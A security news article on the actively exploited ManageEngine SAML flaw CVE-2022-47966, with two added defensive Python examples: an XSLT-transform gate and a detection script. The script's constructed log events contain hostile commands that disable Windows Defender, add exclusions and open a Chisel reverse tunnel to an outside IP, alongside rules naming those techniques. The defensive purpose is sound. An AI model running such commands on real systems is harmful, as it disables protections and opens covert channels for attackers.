Users of on-premises deployments of Zoho ManageEngine products should make sure they have patches applied for a critical remote code execution vulnerability that attackers have now started exploiting in the wild.
Technical details about the flaw, along with a proof-of-concept exploit, were released late last week, which will allow more attackers to add this exploit to their arsenal.
"The vulnerability is easy to exploit and a good candidate for attackers to 'spray and pray' across the Internet," researchers with penetration testing firm Horizon3.ai said in a blog post.
"This vulnerability allows for remote code execution as NT AUTHORITY\SYSTEM, essentially giving an attacker complete control over the system. If a user determines they have been compromised, additional investigation is required to determine any damage an attacker has done."
Zoho released security updates during October and November for multiple products to address the flaw, which is now tracked as CVE-2022-47966.
However, the security advisory was only published this month, and as of last week there were over 1,000 vulnerable instances of ManageEngine products directly exposed to the internet, with probably many more inside large corporate networks.
SAML ShowStopper vulnerability
The vulnerability was found by a researcher named Khoadha, a.k.a. @_l0gg, from Vietnamese firm Viettel Cyber Security and was reported privately to Zoho through its bug bounty program in late October.
When ManageEngine issued its advisory on 10 January, researchers from Horizon3.ai investigated it and reverse-engineered the patch to create a working proof-of-concept exploit.
After giving the community a heads-up that the flaw is very serious and easy to exploit, and sharing some IOCs that could enable exploit detection, they waited several days before publishing their findings. Khoadha published a detailed write-up at the same time.
The issue is located in old versions of the Apache Santuario project's XML Security for Java library (xmlsec), which implements XML Signature verification.
The version bundled with ManageEngine products was more than a decade old. Current versions of the library are not affected, thanks to hardening added over the years, but the exploitation technique Khoadha describes had not been publicly documented before.
Apache Santuario implements security standards for XML, primarily XML-Signature Syntax and Processing and XML Encryption Syntax and Processing. These are commonly used in Security Assertion Markup Language (SAML), a protocol that's popular in single sign-on (SSO) implementations to communicate between identity providers and service providers.
Enterprises use SAML to enable employees to use the same identity across different applications and services.
Zoho ManageEngine provides a suite of enterprise products, many of which support SAML-based SSO. Some products are affected only if SAML SSO is currently enabled, while others are affected if it was ever enabled, even if it has since been turned off. The affected products are:
- Access Manager Plus
- Active Directory 360
- ADAudit Plus
- ADManager Plus
- ADSelfService Plus
- Analytics Plus
- Application Control Plus
- Asset Explorer
- Browser Security Plus
- Device Control Plus
- Endpoint Central
- Endpoint Central MSP
- Endpoint DLP
- Key Manager Plus
- OS Deployer
- PAM 360
- Password Manager Pro
- Patch Manager Plus
- Remote Access Plus
- Remote Monitoring and Management (RMM)
- ServiceDesk Plus
- ServiceDesk Plus MSP
- SupportCenter Plus
- Vulnerability Manager Plus
"In summary, when Apache Santuario is <= v1.4.1, the vulnerability is trivially exploitable and made possible via several conditions: Reference validation is performed before signature validation, allowing for the execution of malicious XSLT transforms; Execution of XSLT transforms allows an attacker to execute arbitrary Java code," the Horizon3 researchers wrote in their analysis.
"This vulnerability is still exploitable even when Apache Santuario is between v1.4.1 and v2.2.3, which some of the affected ManageEngine products were using at the time, such as Password Manager Pro."
Even though the research was done on ManageEngine products, Khoadha warns in his own write-up that the flaw is not limited to them: products from other vendors that use one of the impacted versions of the library for SAML processing could be similarly exploitable. That is why he has dubbed the flaw SAML ShowStopper.
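The Horizon3 summary quoted above gives the mechanism: the library runs the transforms listed on a ds:Reference before it has checked the signature, and an XSLT transform is executed as code. A service provider can close that window regardless of library version by refusing any Reference transform outside a small allowlist before the message reaches the signature library. The following is an added example, not ManageEngine's, Horizon3's or Khoadha's code; the allowlist, the helper names and the two constructed SAML responses are this example's assumptions, and the XSLT body is an inert placeholder rather than a payload. The algorithm URIs are the real identifiers from the XML Signature specification.

```python
import xml.etree.ElementTree as ET

# Namespace and algorithm identifiers from the XML Signature spec (real URIs).
DS_NS = "http://www.w3.org/2000/09/xmldsig#"
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# Transforms a SAML service provider legitimately needs on a Reference.
# Everything else, XSLT above all, is rejected before any verification library
# gets to run it. The allowlist is this example's choice, not a vendor's.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
}


def disallowed_transforms(saml_xml: str) -> list:
    """Return the Algorithm URI of every ds:Transform not on the allowlist.

    The whole document is walked, so a transform placed somewhere unexpected
    (a second Signature element, a nested Reference) is caught as well.
    """
    # For untrusted input in production, parse with defusedxml to blunt
    # entity-expansion attacks; stdlib ElementTree is used here so the
    # example runs with no dependencies.
    root = ET.fromstring(saml_xml)
    found = []
    for transform in root.iter(f"{{{DS_NS}}}Transform"):
        algorithm = transform.get("Algorithm", "")
        if algorithm not in ALLOWED_TRANSFORMS:
            found.append(algorithm)
    return found


def is_safe_to_verify(saml_xml: str) -> bool:
    """Gate to call before handing the response to the XML-DSig library."""
    return not disallowed_transforms(saml_xml)


def _response(transforms: str) -> str:
    """Build a constructed, minimal SAML Response around the given transforms.

    Digest and signature values are dummies: the gate never evaluates them.
    """
    return f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:ds="{DS_NS}" ID="_resp1" Version="2.0">
  <ds:Signature>
    <ds:SignedInfo>
      <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
      <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
      <ds:Reference URI="#_resp1">
        <ds:Transforms>{transforms}</ds:Transforms>
        <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
        <ds:DigestValue>AAAA</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo>
    <ds:SignatureValue>AAAA</ds:SignatureValue>
  </ds:Signature>
</samlp:Response>"""


# Constructed samples. The XSLT body is an inert placeholder stylesheet; a real
# attack would carry a stylesheet the library's XSLT engine turns into code.
BENIGN_RESPONSE = _response(
    '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
)

HOSTILE_RESPONSE = _response(
    '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    f'<ds:Transform Algorithm="{XSLT_TRANSFORM}">'
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
    '<xsl:template match="/"><xsl:text>placeholder</xsl:text></xsl:template>'
    '</xsl:stylesheet></ds:Transform>'
)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RESPONSE), ("hostile", HOSTILE_RESPONSE)):
        verdict = "safe" if is_safe_to_verify(doc) else f"rejected {disallowed_transforms(doc)}"
        print(label, verdict)
```

Because the gate runs on the raw document before any signature library touches it, it does not matter in which order that library validates references and signatures: the XSLT transform is never executed. It is a compensating control, not a substitute for the vendor patch, and it is also a useful detection point, since a legitimate identity provider has no reason to put an XSLT transform on a SAML signature.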
Attackers are already exploiting the ManageEngine flaw
Researchers from security firm Rapid7 reported on 19 January that they had already responded to compromises resulting from exploitation of CVE-2022-47966.
The company later updated its advisory with indicators of compromise seen in the wild, as well as the MITRE ATT&CK techniques the attackers used after exploitation. These included using PowerShell to disable Windows Defender and deploying Chisel, a tunnelling tool written in Go.
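The post-exploitation behaviour Rapid7 describes (Defender disabled through PowerShell, Chisel for tunnelling) is what endpoint telemetry should catch even when the initial SAML request was never logged. The following is an added example, not Rapid7's or ManageEngine's code, that runs two detection rules over constructed process-creation events. The log format, the rule patterns, the ATT&CK mapping and the heuristic of escalating any hit whose parent process is java.exe (ManageEngine products run inside a Java process) are all this example's assumptions; the Set-MpPreference and Add-MpPreference cmdlets and the chisel client syntax are real.

```python
import re

# Constructed process-creation events (fields loosely modelled on Sysmon
# Event ID 1 / Windows 4688). None of these lines are real telemetry.
SAMPLE_EVENTS = [
    "ts=2023-01-20T03:14:07Z host=sdp01 user=NT AUTHORITY\\SYSTEM parent=java.exe "
    "image=powershell.exe cmd=powershell -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true",
    "ts=2023-01-20T03:14:09Z host=sdp01 user=NT AUTHORITY\\SYSTEM parent=java.exe "
    "image=powershell.exe cmd=powershell Add-MpPreference -ExclusionPath C:\\ProgramData\\tmp",
    "ts=2023-01-20T03:15:30Z host=sdp01 user=NT AUTHORITY\\SYSTEM parent=cmd.exe "
    "image=chisel.exe cmd=chisel.exe client 203.0.113.5:8080 R:socks",
    "ts=2023-01-20T08:02:11Z host=ws17 user=CORP\\jdoe parent=explorer.exe "
    "image=powershell.exe cmd=powershell Get-MpPreference",
    "ts=2023-01-20T08:05:45Z host=sdp01 user=NT AUTHORITY\\SYSTEM parent=services.exe "
    "image=java.exe cmd=java.exe -Dcatalina.home=C:\\ManageEngine\\ServiceDesk",
]

# The user field may contain spaces (NT AUTHORITY\SYSTEM), so it is matched
# non-greedily up to the next fixed key.
EVENT_RE = re.compile(r"^ts=(\S+) host=(\S+) user=(.+?) parent=(\S+) image=(\S+) cmd=(.*)$")

# Detection rules written for this example (not Rapid7's published IOCs).
# ATT&CK mapping is ours: T1562.001 Impair Defenses: Disable or Modify Tools,
# T1572 Protocol Tunneling.
RULES = {
    "defender_tamper": re.compile(
        r"\b(Set|Add)-MpPreference\b.*-(Disable\w+|Exclusion\w+)", re.I),
    "chisel_tunnel": re.compile(r"\bchisel(\.exe)?\s+(client|server)\b", re.I),
}

# Assumption encoded here: ManageEngine runs inside a Java process, so an
# exploit payload or web shell shows up as java.exe spawning a shell, and any
# rule hit with that parent is escalated.
WEB_APP_PROCESSES = {"java.exe"}


def parse_event(line):
    """Parse one key=value event line into a dict, or None if malformed."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, host, user, parent, image, cmd = m.groups()
    return {"ts": ts, "host": host, "user": user, "parent": parent.lower(),
            "image": image.lower(), "cmd": cmd}


def detect(lines):
    """Run every rule over the command line of every parseable event."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                severity = "high" if ev["parent"] in WEB_APP_PROCESSES else "medium"
                alerts.append({"rule": rule, "severity": severity, **ev})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["ts"]} {a["host"]} [{a["severity"]}] {a["rule"]}: {a["cmd"]}')
```

On the constructed sample the two Defender-tampering commands spawned by java.exe are raised as high severity and the Chisel client launch as medium, while the administrator's read-only Get-MpPreference and the product's own Java process produce nothing. In a real deployment the same parent-process heuristic would be applied to any child of the ManageEngine service, not only to commands matching these two patterns.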
"Our vulnerability research team found during testing that some products may be more exploitable than others: ServiceDesk Plus, for instance, is easily exploitable with public proof-of-concept code, but ADSelfService Plus requires an attacker to obtain two additional pieces of information and modify the PoC for successful exploitation," the Rapid7 researchers said.
Security firm GreyNoise is also detecting exploitation attempts against its honeypots. Vulnerabilities that allow unauthenticated remote code execution and have a public proof-of-concept are usually adopted quickly by attackers, so the number of attacks is likely to increase.
Organisations that don't directly expose any of these ManageEngine products to the internet should still apply the patches as soon as possible, because attackers can obtain network access in a variety of ways and this flaw can then be exploited for lateral movement.
Many ManageEngine products are used for security, identity management and authentication, so they hold sensitive information.